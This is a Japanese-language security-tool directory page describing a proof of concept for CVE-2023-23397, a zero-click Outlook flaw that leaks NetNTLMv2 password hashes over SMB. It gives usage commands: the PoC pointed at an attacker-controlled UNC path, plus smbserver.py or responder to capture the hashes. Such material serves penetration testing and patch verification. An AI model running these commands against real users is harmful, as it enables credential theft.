Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23397 — CVE-2023-23397脆弱性のシンプルなPoC(メールで送信されるペイロードを使用) | Kitploit
ツール/GitHubGitHub/trackflaw/cve-2023-23397
フィッシングツールパスワード攻撃ペイロード生成脆弱性分析エクスプロイトメールセキュリティ
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

CVE-2023-23397脆弱性のシンプルなPoC(メールで送信されるペイロードを使用)

リポジトリを見る
132283年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23397

CVE-2023-23397 の脆弱性に対するシンプルでダーティな PoC。Outlook のリッチクライアントに影響します。

説明

Outlook は、会議や予定のリマインダーサウンドを構成できるユーザー入力に対する制御が欠如しています。攻撃者は、ユーザーによる操作なしに(ゼロクリック脆弱性)、被害者に対して自身のサーバーへの接続を強制することができます。

この脆弱性を悪用した攻撃者は、SMB リクエストを通じて、トラップされたユーザーのパスワードに基づいた NetNTLMv2 ダイジェストを取得します。リクエストは、メールが受信トレイに届くとすぐにトリガーされます。

PoC の動作

  1. .msg ペイロードを生成します。
  2. カスタム SMTP サーバーを使用してメールで送信します。

使用方法

セッション1:

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

セッション2(必要に応じて smbserver または responder):

root@kitploit:~
smbserver.py -smb2support SHARE .

デモ(手動 PoC)

poc

解説動画(フランス語)

RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397

元記事

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

ツールをダウンロード